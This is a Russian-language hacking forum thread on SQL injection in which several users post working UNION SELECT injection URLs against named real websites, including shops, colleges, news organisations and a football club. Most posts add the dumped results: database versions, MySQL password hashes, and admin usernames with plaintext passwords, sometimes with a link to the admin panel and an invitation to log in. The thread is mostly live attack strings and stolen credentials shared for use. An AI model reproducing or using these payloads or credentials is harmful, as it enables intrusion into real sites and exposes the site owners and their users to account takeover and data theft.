SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. x88x

    x88x Elder - Старейшина

    Joined:
    27 Nov 2007
    Messages:
    208
    Likes Received:
    119
    Reputations:
    16
    да, чуть не забыл =)
    буржуйский онлайн-магазинчик (австралийский)

    Code:
    _http://www.australianopenshop.com/category.php?id=99999+union+select+1,2,3,4,5,6,7,8,9,10,VERSION(),12/*
    Версия мускула: 5.0.27-community-nt
    Юзер: ausopen@netregis-8cuqdh
    База: ausopen


    смотрел таблицы, из достойных могу выделить только:
    tblbilling
    tblmember
    tblorder
    tblorderprod
    tblsiteadmin
    tbluser
     
    1 person likes this.
  2. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    moblog.co.uk
    http://moblog.co.uk/forum
    от форума
    mat:bigmoney
     
  3. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    4.0.27-standard
    HTML:
    http://www.plantgeek.net/article_viewer.php?id=99999999999999+union+select+1,2,concat(version(),database(),user()),4,5,6,7,8,9,1,2,3/*
    4.1.22-log
    HTML:
    http://www.valleys.ru/work.php?id=-9+union+select+1,2,database(),user(),5,6,version(),8,9--
    4.1.20-max-log
    HTML:
    http://www.freepoc.org/viewapp.php?id=-1+union+select+1,version(),3,4,5,6,7,user()--
    HTML:
    http://www.rabidhardware.net/index.php?profile=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,TABLE_NAME,7,8,9,0,1,2,3,4,5,6+FROM+INFORMATION_SCHEMA.TABLES/*
     
    #4843 Sleep, 19 Feb 2008
    Last edited: 19 Feb 2008
  4. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    баян =D
    Code:
    http://www.legal-info-legale.nb.ca/showpub.asp?id=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+users)-- 
    'pleisadmin:s09ofk48f'
    два раза вводить.
     
    2 people like this.
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    СПРАВИЗДАТ - ЖЕЛТЫЕ СТРАНИЦЫ

    _http://www.spr.ru/view.php?id_firm=-22775'+union+select+1,concat(user,char(58),password),3+from+mysql.user+limit+0,1/*

    spraviz8_sam:*26F07D3B38B5FAC4BA063A5D76D2895C73319D78
     
    1 person likes this.
  6. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    www.resheto.ru
    Code:
    http://resheto.ru/photo/index.php?id=0x2d3127%20union+select+1,2,3/*
    
    5.0.32-Debian_7etch1-log/resheto/[email protected]
    по рейтингу на маил в сотке)

    Code:
    http://thefamilyrecords.com/artists.php?artists_id=0x2d3127%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7/*
    
    5.0.24a-standard-log/family_records/[email protected]

    -------------------------------------------------------------
    jokester просто красавчег) нету слов :) до сих пор в оуте)
     
    1 person likes this.
  7. Климент_Ворошилов

    Joined:
    8 Dec 2007
    Messages:
    21
    Likes Received:
    10
    Reputations:
    0
    Официальный сайт футбольного клуба "Металлург" Запорожье.
    http://www.fcmetalurg.com/club/about_team.php?tid=-5+union+select+passwd,2,3,login,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9+from+users/*

    4.0.27-sta

    Модератор-админ на форуме - Fidel:tura
     
    4 people like this.
  8. Momiji

    Momiji Elder - Старейшина

    Joined:
    25 Aug 2007
    Messages:
    495
    Likes Received:
    348
    Reputations:
    127
    wan-press.org
    Code:
    http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,3,concat_ws(0x3,version(),user(),database())/*
    5.0.32-Debian_7etch1-logroot@localhostnewwan
    Code:
    http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,3,concat(user,0x3,password)+from+mysql.user/*
    Code:
    [COLOR=Red]debian-sys-maint:679ee92a1e5d19c1
    pma_9HPasvZaPmz0:090e15576d4d4bd5
    horde:1dedb445714a68b0
    sitebuilder_db:1e4b1f810b9f14b8
    rap21:521c428865968727
    capetown2007:521c428865968727
    pressfreedom:521c428865968727
    conference:521c428865968727
    newsletter:521c428865968727
    newwan:521c428865968727
    wan:521c428865968727
    wdmt:521c428865968727
    wef:521c428865968727
    wpt:521c428865968727
    root:521c428865968727
    xmltospip:
    tablemountain:521c428865968727
    goteborg2008:18788a6d194a1517
    admin:13ba13aa099ab4ac[/COLOR] 
    Таблица с юзерами: front_users
    Колонки: fuser_login, fuser_passwd, fuser_email
    Не смог найти базу в которой эта таблица, через схему вывести не получилось, сцуко скрипт не дает.
     
    1 person likes this.
  9. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,FUSER_PASSWD,4+FROM+3may.Front_users/*
    Но они походу все пустые
    Зато есть http://www.wan-press.org/nie/resourcescontents.php?id=-1+union+select+1,2,concat(BUSER_LOGIN,0x3A,BUSER_PASSWD),4+FROM+3may.Back_users/*
    Login:3mayAdmin
    Pass:Em&y6wan!
     
    #4849 Sleep, 20 Feb 2008
    Last edited: 20 Feb 2008
  10. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    www.symbiant.org & www.reciprocity.cc
     
    1 person likes this.
  11. vp$

    vp$ Elder - Старейшина

    Joined:
    22 Oct 2007
    Messages:
    65
    Likes Received:
    68
    Reputations:
    19
    румынский секс-шоп

    www.sex-shop.ro

    http://www.sex-shop.ro/sexolog_d.php?ID=-12340000+UNION+SELECT+1,2,3,version(),5,6,7,8/*
    4.1.20 /*но не стоит расстраиваться*/
    http://www.sex-shop.ro/sexolog_d.php?ID=-12340000+UNION+SELECT+1,2,3,concat_ws(0x3a,login,pass),5,6,7,8+from+user/*
    mishu:dellinspiron1300

    http://www.sex-shop.ro/admin/login.php
    заходим и админим ;)
     
    3 people like this.
  12. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    http://team-rs.ru/member.php?id=-4%2527+union+select+1,2,3,4,TABLE_NAME,6,user(),8,9,0+FROM+INFORMATION_SCHEMA.TABLES/*
     
    #4852 Sleep, 20 Feb 2008
    Last edited: 20 Feb 2008
    1 person likes this.
  13. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    www.dominican.edu

    Code:
    http://www.dominican.edu/query/ncur/display_ncur.php?id=-2161+union+select+1,2,3,4,5,6,7,user(),database(),version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68.69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119/*
    user() - DUOC_ONLINE@NACIO1
    database() - dominican
    version() - 5.0.26-log
     
    2 people like this.
  14. Haruka

    Haruka Elder - Старейшина

    Joined:
    25 Jul 2007
    Messages:
    48
    Likes Received:
    5
    Reputations:
    -1
    http://borowiha.inetrus.ru/top/inf.php?sid='+union+select+id,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+users+where+id=2/*
    ---
    вот еще, но тут дальше расковырять не получилось.если у кого получится пишите в приват:
    http://wap-top.ru/top/index.php?p=-1
     
    1 person likes this.
  15. Haruka

    Haruka Elder - Старейшина

    Joined:
    25 Jul 2007
    Messages:
    48
    Likes Received:
    5
    Reputations:
    -1
    и еще
    http://kyky.biz/bibl/index.php?i=1&ver=xml&letter='+union+select+1,2,3,4,5/*
     
    2 people like this.
  16. Sleep

    Sleep Elder - Старейшина

    Joined:
    31 Oct 2007
    Messages:
    274
    Likes Received:
    65
    Reputations:
    4
    http://www.cz-usa.com/product_detail.php?id=159999999+union+select+1,2,VERSION(),USER(),DATABASE(),6/*
    VERSION:4.0.21
     
  17. b3

    b3 Banned

    Joined:
    5 Dec 2004
    Messages:
    2,170
    Likes Received:
    1,155
    Reputations:
    202
    Официальный сайт веб-движка becontent. Очень мне понравилась его административная часть. На сайте есть ссылка на скачку, если изменить алгоритм хеширования с стандартного md5 на md5(md5($pass)) или добавить salt, вполне хороший движок.
    А вот и сама уязвимость (банально) :
    alfonso : pippo12
    Доступ в административную часть я заблокировал, привелегии администратора снял, дабы небыло повторных дефейсов, как ето любят делать "неп0хеки".

    СКРИН:
    [​IMG]

    P.S. Профильтровать переменные, изменить алгоритм хеша, не ставить легкие пароли и работать с БД без file_priv отличный движок.
    P.S.S Ссылка на скрине Не реклама!!!
     
    #4857 b3, 21 Feb 2008
    Last edited: 21 Feb 2008
  18. satana8920

    satana8920 Палач Античата

    Joined:
    22 Sep 2006
    Messages:
    396
    Likes Received:
    138
    Reputations:
    6
    HTML:
    http://www.kensybrowns.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
    HTML:
    http://www.arok.dk/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
    HTML:
    http://www.pinocchioclub.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
    HTML:
    http://www.irmilano.it/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
    HTML:
    http://www.maddenitalianleague.eu/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=2
    HTML:
    [HTML]http://www.radiyocristal.com/infusions/calendar_events_panel/show_single.php?sel=-1/**/UNION/**/SELECT/**/0,0,user_password,user_name,0,0,0,0,0,0,0,0/**/FROM/**/fusion_users/**/WHERE/**/user_id=1
    меняем значение в переменной ID и смотрим хеш пасса любого юзверя
    ЗЫ все для ачата
     
    1 person likes this.
  19. 1NtR0

    1NtR0 Elder - Старейшина

    Joined:
    14 Apr 2007
    Messages:
    235
    Likes Received:
    89
    Reputations:
    35
    www.antioch-college.edu


    Code:
    http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,user(),version(),database(),6,7,8,9,10,11,12/*
    user() - acollege_colleg1@localhost
    database() - acollege_college1
    version() - 5.0.27-standard

    Code:
    http://www.antioch-college.edu/news/releases/index.php?id=213+union+select+1,2,id,4,password,6,7,8,9,10,11,12+from+users/*
    id - 13
    md5($password) - 97d735d01e2c3e9ba77719db119b8404
    password - amaruyama
     
    4 people like this.
  20. CaNNabi$

    CaNNabi$ Elder - Старейшина

    Joined:
    21 Jan 2008
    Messages:
    62
    Likes Received:
    110
    Reputations:
    0
    Code:
    http://www.vergelijking.be/gsm/data.php?id=0x3127%20union+select+concat_ws(0x2F,version(),database(),user())/*
    
    5.0.32-Debian_7etch1-log/vergelijking/vergelijking@localhost

    Code:
    http://www.hubbardbrook.org/gis/data.php?id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6,7,8/*
    
    4.1.21-community-nt/hbr/[email protected]' in

    Code:
    http://www.dogrel.com/English/News/article.php?id=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8/*
    
    4.1.21/DB_dogrel/dogrel@localhost

    Code:
    http://www.jdhindia.com/data.php?id=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user())/*
    
    4.1.22-standard-log/loejclsy_jdh/loejclsy_jdh@localhost

    Code:
    http://www.somborvaros.org/data.php?lang=sr&id=0x3127%20union+select+1,2,concat_ws(0x2F,version(),database(),user())/*
    
    4.0.18/somborvaros/[email protected]
     
    1 person likes this.
Thread Status:
Not open for further replies.